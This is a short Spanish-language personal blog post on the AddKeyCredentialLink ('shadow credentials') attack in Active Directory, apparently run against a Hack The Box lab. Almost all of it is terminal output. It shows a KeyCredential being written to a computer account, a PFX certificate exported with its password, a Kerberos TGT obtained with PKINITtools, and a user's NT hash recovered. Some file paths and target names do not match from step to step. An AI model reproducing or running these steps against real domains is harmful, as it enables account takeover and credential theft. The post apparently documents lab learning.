Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

AddKeyCredentialLink Attack

¿Qué es?

Video

Ataque explicado

alt text

... etc
--target "ZPH-SVRMGMT1$" --action "add"
[*] Searching for the target account
[*] Target user found: CN=ZPH-SVRMGMT1,CN=Computers,DC=zsm,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 65727581-ddcd-d67a-efb2-b30390b73d68
[*] Updating the msDS-KeyCredentialLink attribute of ZPH-SVRMGMT1$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: 3cwbk8w6.pfx
[+] PFX exportiert nach: 3cwbk8w6.pfx
[i] Passwort für PFX: LlnaSQgj2Xgivmptjc7S
[+] Saved PFX (#PKCS12) certificate & key at path: 3cwbk8w6.pfx
[*] Must be used with password: LlnaSQgj2Xgivmptjc7S
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(kali㉿kali)-[~/PKINITtools]
└─$ python3 gettgtpkinit.py -cert-pem /home/kali/Desktop/boxes/certified/xBWiCOIx_cert.pem -key-pem /home/kali/Desktop/boxes/certified/xBWiCOIx_priv.pem CERTIFIED.HTB/MANAGEMENT_SVC management_svc.ccache
2025-04-09 20:22:14,587 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-09 20:22:14,594 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-09 20:22:36,051 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-09 20:22:36,051 minikerberos INFO     4de618e5fea336c8dbd69b96766e6a9c183b924f4880652b1662841d6fc7ef95
INFO:minikerberos:4de618e5fea336c8dbd69b96766e6a9c183b924f4880652b1662841d6fc7ef95
2025-04-09 20:22:36,053 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Conseguir NT hash del usuario


┌──(kali㉿kali)-[~/PKINITtools]
└─$ python3 ./getnthash.py -key 4de618e5fea336c8dbd69b96766e6a9c183b924f4880652b1662841d6fc7ef95 CERTIFIED.HTB/MANAGEMENT_SVC
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584